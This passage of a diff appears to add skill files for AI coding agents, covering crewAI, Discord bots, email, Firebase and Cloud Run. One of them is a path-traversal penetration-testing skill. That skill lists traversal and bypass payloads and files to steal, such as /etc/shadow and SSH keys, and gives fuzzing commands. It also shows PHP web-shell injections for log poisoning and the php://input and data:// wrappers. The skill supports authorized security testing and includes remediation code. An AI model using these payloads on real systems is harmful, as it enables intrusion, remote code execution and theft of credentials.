        return Agent(config=self.agents_config['researcher'])

    @agent
    def writer(self) -> Agent:
        return Agent(config=self.agents_config['writer'])

    @task
    def research_task(self) -> Task:
        return Task(config=self.tasks_config['research_task'])

    @task
    def writing_task(self) -> Task:
        return Task(config=self.tasks_config['writing_task'])
        # (crew assembly method truncated in source)
```
### Hierarchical Process

Manager agent delegates to workers.

**When to use**: Complex tasks needing coordination
```python
from crewai import Agent, Crew, Process
from langchain_openai import ChatOpenAI  # import added for manager_llm below

# Define specialized agents
researcher = Agent(
    role="Research Specialist",
    goal="Find accurate information",
    backstory="Expert researcher..."
)

analyst = Agent(
    role="Data Analyst",
    goal="Analyze and interpret data",
    backstory="Expert analyst..."
)

writer = Agent(
    role="Content Writer",
    goal="Create engaging content",
    backstory="Expert writer..."
)

# Hierarchical crew - manager coordinates
crew = Crew(
    agents=[researcher, analyst, writer],
    tasks=[research_task, analysis_task, writing_task],
    process=Process.hierarchical,
    manager_llm=ChatOpenAI(model="gpt-4o"),  # Manager model
    verbose=True
)

# Manager decides:
# - Which agent handles which task
# - When to delegate
# - How to combine results

result = crew.kickoff()
```
### Planning Feature

Generate an execution plan before running.

**When to use**: Complex workflows needing structure
```python
from crewai import Crew, Process
from langchain_openai import ChatOpenAI  # import added for planning_llm below

# Enable planning
crew = Crew(
    agents=[researcher, writer, reviewer],
    tasks=[research, write, review],
    process=Process.sequential,
    planning=True,  # Enable planning
    planning_llm=ChatOpenAI(model="gpt-4o")  # Planner model
)

# With planning enabled:
# 1. CrewAI generates a step-by-step plan
# 2. The plan is injected into each task
# 3. Agents see the overall structure
# 4. More consistent results

result = crew.kickoff()

# Access the plan
print(crew.plan)
```
## Anti-Patterns

### ❌ Vague Agent Roles

**Why bad**: The agent doesn't know its specialty. Overlapping responsibilities. Poor task delegation.

**Instead**: Be specific:

- "Senior React Developer", not "Developer"
- "Financial Analyst specializing in crypto", not "Analyst"
- Include specific skills in the backstory.

### ❌ Missing Expected Outputs

**Why bad**: The agent doesn't know the done criteria. Inconsistent outputs. Hard to chain tasks.

**Instead**: Always specify `expected_output`:

    expected_output: |
      A JSON object with:
      - summary: string (100 words max)
      - key_points: list of strings
      - confidence: float 0-1

### ❌ Too Many Agents

**Why bad**: Coordination overhead. Inconsistent communication. Slower execution.

**Instead**: Use 3-5 agents with clear roles. One agent can handle multiple related tasks. Use tools instead of agents for simple actions.

## Limitations

- Python-only
- Best for structured workflows
- Can be verbose for simple cases
- Flows are a newer feature

## Related Skills

Works well with: `langgraph`, `autonomous-agents`, `langfuse`, `structured-output`

277 skills/discord-bot-architect/SKILL.md Normal file
@@ -0,0 +1,277 @@

---
name: discord-bot-architect
description: "Specialized skill for building production-ready Discord bots. Covers Discord.js (JavaScript) and Pycord (Python), gateway intents, slash commands, interactive components, rate limiting, and sharding."
source: vibeship-spawner-skills (Apache 2.0)
---

# Discord Bot Architect

## Patterns

### Discord.js v14 Foundation

Modern Discord bot setup with Discord.js v14 and slash commands.

**When to use**:

- Building Discord bots with JavaScript/TypeScript
- Need a full gateway connection with events
- Building bots with complex interactions

```javascript
// src/index.js
const { Client, Collection, GatewayIntentBits, Events } = require('discord.js');
const fs = require('node:fs');
const path = require('node:path');
require('dotenv').config();

// Create client with minimal required intents
const client = new Client({
  intents: [
    GatewayIntentBits.Guilds,
    // Add only what you need:
    // GatewayIntentBits.GuildMessages,
    // GatewayIntentBits.MessageContent, // PRIVILEGED - avoid if possible
  ]
});

// Load commands
client.commands = new Collection();
const commandsPath = path.join(__dirname, 'commands');
const commandFiles = fs.readdirSync(commandsPath).filter(f => f.endsWith('.js'));

for (const file of commandFiles) {
  const filePath = path.join(commandsPath, file);
  const command = require(filePath);
  if ('data' in command && 'execute' in command) {
    client.commands.set(command.data.name, command);
  }
}

// Load events
const eventsPath = path.join(__dirname, 'events');
const eventFiles = fs.readdirSync(eventsPath).filter(f => f.endsWith('.js'));

for (const file of eventFiles) {
  const filePath = path.join(eventsPath, file);
  const event = require(filePath);
  if (event.once) {
    client.once(event.name, (...args) => event.execute(...args));
  } else {
    client.on(event.name, (...args) => event.execute(...args));
  }
}

client.login(process.env.DISCORD_TOKEN);
```

```javascript
// src/commands/ping.js
const { SlashCommandBuilder } = require('discord.js');

module.exports = {
  data: new SlashCommandBuilder()
    .setName('ping')
    .setDescription('Replies with Pong!'),

  async execute(interaction) {
    const sent = await interaction.reply({
      content: 'Pinging...',
      fetchReply: true
    });

    const latency = sent.createdTimestamp - interaction.createdTimestamp;
    await interaction.editReply(`Pong! Latency: ${latency}ms`);
  }
};
```

```javascript
// src/events/interactionCreate.js
const { Events } = require('discord.js');

module.exports = {
  name: Events.InteractionCreate,
  async execute(interaction) {
    if (!interaction.isChatInputCommand()) return;
    const command = interaction.client.commands.get(interaction.commandName);
    if (command) await command.execute(interaction);
  }
};
```

### Pycord Bot Foundation

Discord bot with Pycord (Python) and application commands.

**When to use**:

- Building Discord bots with Python
- Prefer async/await patterns
- Need good slash command support

```python
# main.py
import os
import discord
from discord.ext import commands
from dotenv import load_dotenv

load_dotenv()

# Configure intents - only enable what you need
intents = discord.Intents.default()
# intents.message_content = True  # PRIVILEGED - avoid if possible
# intents.members = True  # PRIVILEGED

bot = commands.Bot(
    command_prefix="!",  # Legacy, prefer slash commands
    intents=intents
)

@bot.event
async def on_ready():
    print(f"Logged in as {bot.user}")
    # Sync commands (do this carefully - see sharp edges)
    # await bot.sync_commands()

# Slash command
@bot.slash_command(name="ping", description="Check bot latency")
async def ping(ctx: discord.ApplicationContext):
    latency = round(bot.latency * 1000)
    await ctx.respond(f"Pong! Latency: {latency}ms")

# Slash command with options
@bot.slash_command(name="greet", description="Greet a user")
async def greet(
    ctx: discord.ApplicationContext,
    user: discord.Option(discord.Member, "User to greet"),
    message: discord.Option(str, "Custom message", required=False)
):
    msg = message or "Hello!"
    await ctx.respond(f"{user.mention}, {msg}")

# Load cogs
for filename in os.listdir("./cogs"):
    if filename.endswith(".py"):
        bot.load_extension(f"cogs.{filename[:-3]}")

bot.run(os.environ["DISCORD_TOKEN"])
```

```python
# cogs/general.py
import discord
from discord.ext import commands


class General(commands.Cog):
    def __init__(self, bot):
        self.bot = bot

    @commands.slash_command(name="info", description="Bot information")
    async def info(self, ctx: discord.ApplicationContext):
        embed = discord.Embed(
            title="Bot Info",
            description="A helpful Discord bot",
            color=discord.Color.blue()
        )
        embed.add_field(name="Servers", value=len(self.bot.guilds))
        embed.add_field(name="Latency", value=f"{round(self.bot.latency * 1000)}ms")
        await ctx.respond(embed=embed)

    @commands.Cog.listener()
    async def on_ready(self):
        print("General cog ready")


def setup(bot):  # required for bot.load_extension()
    bot.add_cog(General(bot))
```

### Interactive Components Pattern

Using buttons, select menus, and modals for rich UX.

**When to use**:

- Need interactive user interfaces
- Collecting user input beyond slash command options
- Building menus, confirmations, or forms

```javascript
// Discord.js - Buttons and Select Menus
const {
  SlashCommandBuilder,
  ActionRowBuilder,
  ButtonBuilder,
  ButtonStyle,
  StringSelectMenuBuilder,
  ModalBuilder,
  TextInputBuilder,
  TextInputStyle
} = require('discord.js');

module.exports = {
  data: new SlashCommandBuilder()
    .setName('menu')
    .setDescription('Shows an interactive menu'),

  async execute(interaction) {
    // Button row
    const buttonRow = new ActionRowBuilder()
      .addComponents(
        new ButtonBuilder()
          .setCustomId('confirm')
          .setLabel('Confirm')
          .setStyle(ButtonStyle.Primary),
        new ButtonBuilder()
          .setCustomId('cancel')
          .setLabel('Cancel')
          .setStyle(ButtonStyle.Danger),
        new ButtonBuilder()
          .setLabel('Documentation')
          .setURL('https://discord.js.org')
          .setStyle(ButtonStyle.Link) // Link buttons don't emit events
      );

    // Select menu row (one per row, takes all 5 slots)
    const selectRow = new ActionRowBuilder()
      .addComponents(
        new StringSelectMenuBuilder()
          .setCustomId('select-role')
          .setPlaceholder('Select a role')
          .setMinValues(1)
          .setMaxValues(3)
          .addOptions([
            { label: 'Developer', value: 'dev', emoji: '💻' },
            { label: 'Designer', value: 'design', emoji: '🎨' },
            { label: 'Community', value: 'community', emoji: '🎉' }
          ])
      );

    await interaction.reply({
      content: 'Choose an option:',
      components: [buttonRow, selectRow]
    });

    // Collect responses
    const collector = interaction.channel.createMessageComponentCollector({
      filter: i => i.user.id === interaction.user.id,
      time: 60_000 // 60 seconds timeout
    });

    collector.on('collect', async i => {
      if (i.customId === 'confirm') {
        await i.update({ content: 'Confirmed!', components: [] });
        collector.stop();
      } else if (i.customId === 'cancel') {
        await i.update({ content: 'Cancelled.', components: [] });
        collector.stop();
      }
    });
  }
};
```

## Anti-Patterns

### ❌ Message Content for Commands

**Why bad**: The Message Content intent is privileged and deprecated for bot commands. Slash commands are the intended approach.

### ❌ Syncing Commands on Every Start

**Why bad**: Command registration is rate limited. Global commands take up to 1 hour to propagate. Syncing on every start wastes API calls and can hit limits.

### ❌ Blocking the Event Loop

**Why bad**: The Discord gateway requires regular heartbeats. Blocking operations cause missed heartbeats and disconnections.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| 3-second interaction acknowledgement deadline | critical | Acknowledge immediately, process later |
| Privileged intents not enabled | critical | Enable them in the Developer Portal first |
| Command registration rate limits | high | Use a separate deploy script (not on startup) |
| Hardcoded bot token | critical | Never hardcode tokens |
| Wrong scopes/permissions on invite | high | Generate the correct invite URL |
| Global commands slow to propagate | medium | Development: use guild commands |
| Blocking calls drop the gateway | medium | Never block the event loop |
| Modal must be the first response | medium | Show the modal immediately |
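The first row is the one that bites most new bots: interactions must be acknowledged within 3 seconds. A sketch of the defer-then-edit flow, with the interaction stubbed out so it runs without a gateway connection (the stub and `slowWork` are ours, not Discord.js API):

```javascript
// Sketch: defer within 3 seconds, then take your time.
// `interaction` is a stub here; in a real bot it comes from Discord.js.
async function handle(interaction, slowWork) {
  await interaction.deferReply();   // acknowledge within the 3s window
  const result = await slowWork();  // afterwards you have up to 15 minutes
  await interaction.editReply(result);
}

// Stubbed usage:
const calls = [];
const fakeInteraction = {
  deferReply: async () => calls.push('defer'),
  editReply: async (msg) => calls.push('edit:' + msg),
};

handle(fakeInteraction, async () => 'done').then(() => {
  console.log(calls.join(','));  // prints "defer,edit:done"
});
```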
54 skills/email-systems/SKILL.md Normal file
@@ -0,0 +1,54 @@

---
name: email-systems
description: "Email has the highest ROI of any marketing channel: $36 for every $1 spent. Yet most startups treat it as an afterthought - bulk blasts, no personalization, landing in spam folders. This skill covers transactional email that works, marketing automation that converts, deliverability that reaches inboxes, and the infrastructure decisions that scale."
source: vibeship-spawner-skills (Apache 2.0)
---

# Email Systems

You are an email systems engineer who has maintained 99.9% deliverability
across millions of emails. You've debugged SPF/DKIM/DMARC, dealt with
blacklists, and optimized for inbox placement. You know that email is the
highest ROI channel when done right, and a spam-folder nightmare when done
wrong. You treat deliverability as infrastructure, not an afterthought.

## Patterns

### Transactional Email Queue

Queue all transactional emails with retry logic and monitoring.
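The retry half of that queue can be sketched in a few lines; `send_fn`, the backoff parameters, and the fake sender below are illustrative, not tied to any specific provider's API:

```python
import time

def send_with_retry(send_fn, message, max_attempts=3, base_delay=1.0):
    """Try to send an email, backing off exponentially between attempts.

    `send_fn` is whatever your provider exposes (hypothetical here);
    it should raise on failure.
    """
    for attempt in range(1, max_attempts + 1):
        try:
            return send_fn(message)
        except Exception:
            if attempt == max_attempts:
                raise  # give up: surface to monitoring / dead-letter queue
            time.sleep(base_delay * 2 ** (attempt - 1))

# Usage with a flaky fake sender that succeeds on the third try:
calls = []
def flaky(msg):
    calls.append(msg)
    if len(calls) < 3:
        raise RuntimeError("SMTP timeout")
    return "queued"

assert send_with_retry(flaky, {"to": "user@example.com"}, base_delay=0) == "queued"
assert len(calls) == 3
```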
### Email Event Tracking

Track delivery, opens, clicks, bounces, and complaints.

### Template Versioning

Version email templates for rollback and A/B testing.

## Anti-Patterns

### ❌ HTML email soup

**Why bad**: Email clients render differently. Outlook breaks everything.

### ❌ No plain text fallback

**Why bad**: Some clients strip HTML. Accessibility issues. Spam signal.

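The fix is a `multipart/alternative` message; with Python's standard library it looks like this (addresses and copy are placeholders):

```python
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

msg = MIMEMultipart("alternative")
msg["Subject"] = "Welcome"
msg["From"] = "hello@example.com"
msg["To"] = "user@example.com"
# Attach plain text FIRST; clients prefer the last part they can render.
msg.attach(MIMEText("Welcome to our service!", "plain"))
msg.attach(MIMEText("<h1>Welcome to our service!</h1>", "html"))

assert msg.is_multipart()
```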
### ❌ Huge image emails

**Why bad**: Images are blocked by default. Spam trigger. Slow loading.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Missing SPF, DKIM, or DMARC records | critical | Publish all three DNS records |
| Using shared IP for transactional email | high | Separate transactional from marketing traffic |
| Not processing bounce notifications | high | Handle bounce webhooks and suppress hard bounces |
| Missing or hidden unsubscribe link | critical | Include a clear, working unsubscribe link |
| Sending HTML without plain text alternative | medium | Always send multipart (HTML plus plain text) |
| Sending high volume from new IP immediately | high | Follow an IP warm-up schedule |
| Emailing people who did not opt in | critical | Only email recipients with explicit permission |
| Emails that are mostly or entirely images | medium | Balance images and text |
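The SPF/DKIM/DMARC row comes down to three TXT records. An illustrative set, where the host names, the `s1` selector, and the policy values are examples rather than prescriptions:

```
example.com.                TXT  "v=spf1 include:_spf.provider.com ~all"
s1._domainkey.example.com.  TXT  "v=DKIM1; k=rsa; p=<public-key>"
_dmarc.example.com.         TXT  "v=DMARC1; p=quarantine; rua=mailto:dmarc@example.com"
```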
483 skills/file-path-traversal/SKILL.md Normal file
@@ -0,0 +1,483 @@

---
name: File Path Traversal Testing
description: This skill should be used when the user asks to "test for directory traversal", "exploit path traversal vulnerabilities", "read arbitrary files through web applications", "find LFI vulnerabilities", or "access files outside web root". It provides comprehensive file path traversal attack and testing methodologies.
---

# File Path Traversal Testing

## Purpose

Identify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code. This vulnerability occurs when user-controllable input is passed to filesystem APIs without proper validation.

## Prerequisites

### Required Tools

- Web browser with developer tools
- Burp Suite or OWASP ZAP
- cURL for testing payloads
- Wordlists for automation
- ffuf or wfuzz for fuzzing

### Required Knowledge

- HTTP request/response structure
- Linux and Windows filesystem layout
- Web application architecture
- Basic understanding of file APIs

## Outputs and Deliverables

1. **Vulnerability Report** - Identified traversal points and severity
2. **Exploitation Proof** - Extracted file contents
3. **Impact Assessment** - Accessible files and data exposure
4. **Remediation Guidance** - Secure coding recommendations

## Core Workflow

### Phase 1: Understanding Path Traversal

Path traversal occurs when applications use user input to construct file paths:

```php
// Vulnerable PHP code example
$template = "blue.php";
if (isset($_COOKIE['template']) && !empty($_COOKIE['template'])) {
    $template = $_COOKIE['template'];
}
include("/home/user/templates/" . $template);
```

Attack principle:

- The `../` sequence moves up one directory
- Chain multiple sequences to reach root
- Access files outside the intended directory

Impact:

- **Confidentiality** - Read sensitive files
- **Integrity** - Write/modify files (in some cases)
- **Availability** - Delete files (in some cases)
- **Code Execution** - If combined with file upload or log poisoning

### Phase 2: Identifying Traversal Points

Map the application for potential file operations:

```bash
# Parameters that often handle files
?file=
?path=
?page=
?template=
?filename=
?doc=
?document=
?folder=
?dir=
?include=
?src=
?source=
?content=
?view=
?download=
?load=
?read=
?retrieve=
```

Common vulnerable functionality:

- Image loading: `/image?filename=23.jpg`
- Template selection: `?template=blue.php`
- File downloads: `/download?file=report.pdf`
- Document viewers: `/view?doc=manual.pdf`
- Include mechanisms: `?page=about`

### Phase 3: Basic Exploitation Techniques

#### Simple Path Traversal

```bash
# Basic Linux traversal
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd

# Windows traversal
..\..\..\windows\win.ini
..\..\..\..\windows\system32\drivers\etc\hosts

# URL encoded
..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252Fetc%252Fpasswd  # Double encoding

# Test payloads with curl
curl "http://target.com/image?filename=../../../etc/passwd"
curl "http://target.com/download?file=....//....//....//etc/passwd"
```

#### Absolute Path Injection

```bash
# Direct absolute path (Linux)
/etc/passwd
/etc/shadow
/etc/hosts
/proc/self/environ

# Direct absolute path (Windows)
C:\windows\win.ini
C:\windows\system32\drivers\etc\hosts
C:\boot.ini
```

### Phase 4: Bypass Techniques

#### Bypass Stripped Traversal Sequences

```bash
# When ../ is stripped once
....//....//....//etc/passwd
....\/....\/....\/etc/passwd

# Nested traversal
..././..././..././etc/passwd
....//....//etc/passwd

# Mixed encoding
..%2f..%2f..%2fetc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
```

#### Bypass Extension Validation

```bash
# Null byte injection (older PHP versions)
../../../etc/passwd%00.jpg
../../../etc/passwd%00.png

# Path truncation
../../../etc/passwd...............................

# Double extension
../../../etc/passwd.jpg.php
```

#### Bypass Base Directory Validation

```bash
# When the path must start with the expected directory
/var/www/images/../../../etc/passwd

# Expected path followed by traversal
images/../../../etc/passwd
```

#### Bypass Blacklist Filters

```bash
# Unicode/UTF-8 encoding
..%c0%af..%c0%af..%c0%afetc/passwd
..%c1%9c..%c1%9c..%c1%9cetc/passwd

# Overlong UTF-8 encoding
%c0%2e%c0%2e%c0%af

# URL encoding variations
%2e%2e/
%2e%2e%5c
..%5c
..%255c

# Case variations (Windows)
....\\....\\etc\\passwd
```

### Phase 5: Linux Target Files

High-value files to target:

```bash
# System files
/etc/passwd                  # User accounts
/etc/shadow                  # Password hashes (root only)
/etc/group                   # Group information
/etc/hosts                   # Host mappings
/etc/hostname                # System hostname
/etc/issue                   # System banner

# SSH files
/root/.ssh/id_rsa            # Root private key
/root/.ssh/authorized_keys   # Authorized keys
/home/<user>/.ssh/id_rsa     # User private keys
/etc/ssh/sshd_config         # SSH configuration

# Web server files
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/etc/apache2/sites-enabled/000-default.conf
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log

# Application files
/var/www/html/config.php
/var/www/html/wp-config.php
/var/www/html/.htaccess
/var/www/html/web.config

# Process information
/proc/self/environ           # Environment variables
/proc/self/cmdline           # Process command line
/proc/self/fd/0              # File descriptors
/proc/version                # Kernel version

# Common application configs
/etc/mysql/my.cnf
/etc/postgresql/*/postgresql.conf
/opt/lampp/etc/httpd.conf
```

### Phase 6: Windows Target Files

Windows-specific targets:

```bash
# System files
C:\windows\win.ini
C:\windows\system.ini
C:\boot.ini
C:\windows\system32\drivers\etc\hosts
C:\windows\system32\config\SAM
C:\windows\repair\SAM

# IIS files
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\W3SVC1\

# Configuration files
C:\xampp\apache\conf\httpd.conf
C:\xampp\mysql\data\mysql\user.MYD
C:\xampp\passwords.txt
C:\xampp\phpmyadmin\config.inc.php

# User files
C:\Users\<user>\.ssh\id_rsa
C:\Users\<user>\Desktop\
C:\Documents and Settings\<user>\
```

### Phase 7: Automated Testing

#### Using Burp Suite

```
1. Capture a request with a file parameter
2. Send to Intruder
3. Mark the file parameter value as the payload position
4. Load a path traversal wordlist
5. Start the attack
6. Filter responses by size/content for success
```

#### Using ffuf

```bash
# Basic traversal fuzzing
ffuf -u "http://target.com/image?filename=FUZZ" \
  -w /usr/share/wordlists/traversal.txt \
  -mc 200

# Fuzzing with encoding
ffuf -u "http://target.com/page?file=FUZZ" \
  -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
  -mc 200,500 -ac
```

#### Using wfuzz

```bash
# Traverse to /etc/passwd
wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
  --hc 404 \
  "http://target.com/index.php?file=FUZZ"

# With headers/cookies
wfuzz -c -z file,traversal.txt \
  -H "Cookie: session=abc123" \
  "http://target.com/load?path=FUZZ"
```

### Phase 8: LFI to RCE Escalation

#### Log Poisoning

```bash
# Inject PHP code into logs via the User-Agent
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/

# Include the Apache log file
curl "http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id"

# Include auth.log (SSH)
# First: ssh '<?php system($_GET["cmd"]); ?>'@target.com
curl "http://target.com/page?file=../../../var/log/auth.log&cmd=whoami"
```

#### /proc/self/environ

```bash
# Inject via User-Agent
curl -A "<?php system('id'); ?>" \
  "http://target.com/page?file=/proc/self/environ"

# With a command parameter
curl -A "<?php system(\$_GET['c']); ?>" \
  "http://target.com/page?file=/proc/self/environ&c=whoami"
```

#### PHP Wrapper Exploitation

```bash
# php://filter - Read source code as base64
curl "http://target.com/page?file=php://filter/convert.base64-encode/resource=config.php"

# php://input - Execute POST data as PHP
curl -X POST -d "<?php system('id'); ?>" \
  "http://target.com/page?file=php://input"

# data:// - Execute inline PHP
curl "http://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==&c=id"

# expect:// - Execute system commands
curl "http://target.com/page?file=expect://id"
```

### Phase 9: Testing Methodology

Structured testing approach:

```bash
# Step 1: Identify potential parameters
# Look for file-related functionality

# Step 2: Test basic traversal
../../../etc/passwd

# Step 3: Test encoding variations
..%2F..%2F..%2Fetc%2Fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

# Step 4: Test bypass techniques
....//....//....//etc/passwd
..;/..;/..;/etc/passwd

# Step 5: Test absolute paths
/etc/passwd

# Step 6: Test with null bytes (legacy)
../../../etc/passwd%00.jpg

# Step 7: Attempt wrapper exploitation
php://filter/convert.base64-encode/resource=index.php

# Step 8: Attempt log poisoning for RCE
```

### Phase 10: Prevention Measures

Secure coding practices:

```php
// PHP: Use basename() to strip paths
$filename = basename($_GET['file']);
$path = "/var/www/files/" . $filename;

// PHP: Validate against a whitelist
$allowed = ['report.pdf', 'manual.pdf', 'guide.pdf'];
if (in_array($_GET['file'], $allowed)) {
    include("/var/www/files/" . $_GET['file']);
}

// PHP: Canonicalize and verify the base path
$base = "/var/www/files/";
$realBase = realpath($base);
$userPath = $base . $_GET['file'];
$realUserPath = realpath($userPath);

// Compare against the base plus a separator so that a sibling
// directory such as /var/www/files_evil does not pass the check
if ($realUserPath && strpos($realUserPath, $realBase . DIRECTORY_SEPARATOR) === 0) {
    include($realUserPath);
}
```

```python
# Python: Use os.path.realpath() and validate
import os

def safe_file_access(base_dir, filename):
    # Resolve to absolute, canonical paths
    base = os.path.realpath(base_dir)
    file_path = os.path.realpath(os.path.join(base, filename))

    # Verify the file is within the base directory; comparing path
    # components avoids the /var/www/files vs /var/www/files_evil
    # string-prefix pitfall
    if os.path.commonpath([base, file_path]) == base:
        with open(file_path, 'r') as f:
            return f.read()
    else:
        raise PermissionError("Access denied")
```

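One subtlety worth making explicit: validating with a raw string-prefix check accepts sibling paths that merely share a name prefix. A short demonstration of the component-wise alternative (`is_inside` is an illustrative helper, not part of any library):

```python
import os.path

def is_inside(base_dir: str, candidate: str) -> bool:
    # Compare canonical paths component-wise, not as raw strings
    base = os.path.realpath(base_dir)
    target = os.path.realpath(candidate)
    return os.path.commonpath([base, target]) == base

# A plain startswith() check would wrongly accept a sibling directory:
assert "/var/www/files_evil".startswith("/var/www/files")
assert not is_inside("/var/www/files", "/var/www/files_evil")
assert is_inside("/var/www/files", "/var/www/files/report.pdf")
```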
## Quick Reference

### Common Payloads

| Payload | Target |
|---------|--------|
| `../../../etc/passwd` | Linux password file |
| `..\..\..\..\windows\win.ini` | Windows INI file |
| `....//....//....//etc/passwd` | Bypass simple filter |
| `/etc/passwd` | Absolute path |
| `php://filter/convert.base64-encode/resource=config.php` | Source code |

### Target Files

| OS | File | Purpose |
|----|------|---------|
| Linux | `/etc/passwd` | User accounts |
| Linux | `/etc/shadow` | Password hashes |
| Linux | `/proc/self/environ` | Environment vars |
| Windows | `C:\windows\win.ini` | System config |
| Windows | `C:\boot.ini` | Boot config |
| Web | `wp-config.php` | WordPress DB creds |

### Encoding Variants

| Type | Example |
|------|---------|
| URL Encoding | `%2e%2e%2f` = `../` |
| Double Encoding | `%252e%252e%252f` = `../` |
| Unicode | `%c0%af` = `/` |
| Null Byte | `%00` |

## Constraints and Limitations

### Permission Restrictions

- Cannot read files the application user cannot access
- The shadow file requires root privileges
- Many files have restrictive permissions

### Application Restrictions

- Extension validation may limit file types
- Base path validation may restrict scope
- A WAF may block common payloads

### Testing Considerations

- Respect the authorized scope
- Avoid accessing genuinely sensitive data
- Document all successful access

## Troubleshooting

| Problem | Solutions |
|---------|-----------|
| No response difference | Try encoding, blind traversal, different files |
| Payload blocked | Use encoding variants, nested sequences, case variations |
| Cannot escalate to RCE | Check logs, PHP wrappers, file upload, session poisoning |

22 skills/file-uploads/SKILL.md Normal file
@@ -0,0 +1,22 @@

---
name: file-uploads
description: "Expert at handling file uploads and cloud storage. Covers S3, Cloudflare R2, presigned URLs, multipart uploads, and image optimization. Knows how to handle large files without blocking. Use when: file upload, S3, R2, presigned URL, multipart."
source: vibeship-spawner-skills (Apache 2.0)
---

# File Uploads & Storage

**Role**: File Upload Specialist

Careful about security and performance. Never trusts file
extensions. Knows that large uploads need special handling.
Prefers presigned URLs over server proxying.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Trusting client-provided file type | critical | Check magic bytes server-side |
| No upload size restrictions | high | Set size limits |
| User-controlled filename allows path traversal | critical | Sanitize filenames |
| Presigned URL shared or cached incorrectly | medium | Control presigned URL distribution |
56 skills/firebase/SKILL.md Normal file
@@ -0,0 +1,56 @@

---
name: firebase
description: "Firebase gives you a complete backend in minutes - auth, database, storage, functions, hosting. But the ease of setup hides real complexity. Security rules are your last line of defense, and they're often wrong. Firestore queries are limited, and you learn this after you've designed your data model. This skill covers Firebase Authentication, Firestore, Realtime Database, Cloud Functions, Cloud Storage, and Firebase Hosting. Key insight: Firebase is optimized for read-heavy, denormalized data."
source: vibeship-spawner-skills (Apache 2.0)
---

# Firebase

You're a developer who has shipped dozens of Firebase projects. You've seen the
"easy" path lead to security breaches, runaway costs, and impossible migrations.
You know Firebase is powerful, but you also know its sharp edges.

Your hard-won lessons: The team that skipped security rules got pwned. The team
that designed Firestore like SQL couldn't query their data. The team that
attached listeners to large collections got a $10k bill. You've learned from
all of them.

You advocate for Firebase where it fits, with eyes open to its sharp edges.

## Capabilities

- firebase-auth
- firestore
- firebase-realtime-database
- firebase-cloud-functions
- firebase-storage
- firebase-hosting
- firebase-security-rules
- firebase-admin-sdk
- firebase-emulators

## Patterns

### Modular SDK Import

Import only what you need for smaller bundles.

### Security Rules Design

Secure your data with proper rules from day one.
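A minimal sketch of what "proper rules from day one" can look like: an owner-only rule for a per-user collection (the `users` collection name is illustrative; anything not matched by a rule is denied by default):

```
rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    match /users/{userId} {
      // Only the authenticated owner may read or write their document
      allow read, write: if request.auth != null
                         && request.auth.uid == userId;
    }
  }
}
```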
### Data Modeling for Queries

Design the Firestore data structure around query patterns.

## Anti-Patterns

### ❌ No Security Rules

### ❌ Client-Side Admin Operations

### ❌ Listener on Large Collections

## Related Skills

Works well with: `nextjs-app-router`, `react-patterns`, `authentication-oauth`, `stripe`

288 skills/gcp-cloud-run/SKILL.md Normal file
@@ -0,0 +1,288 @@

---
name: gcp-cloud-run
description: "Specialized skill for building production-ready serverless applications on GCP. Covers Cloud Run services (containerized), Cloud Run Functions (event-driven), cold start optimization, and event-driven architecture with Pub/Sub."
source: vibeship-spawner-skills (Apache 2.0)
---

# GCP Cloud Run

## Patterns

### Cloud Run Service Pattern

Containerized web service on Cloud Run.

**When to use**:

- Web applications and APIs
- Need any runtime or library
- Complex services with multiple endpoints
- Stateless containerized workloads

```dockerfile
# Dockerfile - Multi-stage build for a smaller image
FROM node:20-slim AS builder
WORKDIR /app
COPY package*.json ./
RUN npm ci --only=production

FROM node:20-slim
WORKDIR /app

# Copy only production dependencies
COPY --from=builder /app/node_modules ./node_modules
COPY src ./src
COPY package.json ./

# Cloud Run uses the PORT env variable
ENV PORT=8080
EXPOSE 8080

# Run as non-root user
USER node

CMD ["node", "src/index.js"]
```
|
||||
|
||||
```javascript
|
||||
// src/index.js
|
||||
const express = require('express');
|
||||
const app = express();
|
||||
|
||||
app.use(express.json());
|
||||
|
||||
// Health check endpoint
|
||||
app.get('/health', (req, res) => {
|
||||
res.status(200).send('OK');
|
||||
});
|
||||
|
||||
// API routes
|
||||
app.get('/api/items/:id', async (req, res) => {
|
||||
try {
|
||||
const item = await getItem(req.params.id);
|
||||
res.json(item);
|
||||
} catch (error) {
|
||||
console.error('Error:', error);
|
||||
res.status(500).json({ error: 'Internal server error' });
|
||||
}
|
||||
});
|
||||
|
||||
// Graceful shutdown
|
||||
process.on('SIGTERM', () => {
|
||||
console.log('SIGTERM received, shutting down gracefully');
|
||||
server.close(() => {
|
||||
console.log('Server closed');
|
||||
process.exit(0);
|
||||
});
|
||||
});
|
||||
|
||||
const PORT = process.env.PORT || 8080;
|
||||
const server = app.listen(PORT, () => {
|
||||
console.log(`Server listening on port ${PORT}`);
|
||||
});
|
||||
```
|
||||
|
||||
```yaml
|
||||
# cloudbuild.yaml
|
||||
steps:
|
||||
# Build the container image
|
||||
- name: 'gcr.io/cloud-builders/docker'
|
||||
args: ['build', '-t', 'gcr.io/$PROJECT_ID/my-service:$COMMIT_SHA', '.']
|
||||
|
||||
# Push the container image
|
||||
- name: 'gcr.io/cloud-builders/docker'
|
||||
args: ['push', 'gcr.io/$PROJECT_ID/my-service:$COMMIT_SHA']
|
||||
|
||||
# Deploy to Cloud Run
|
||||
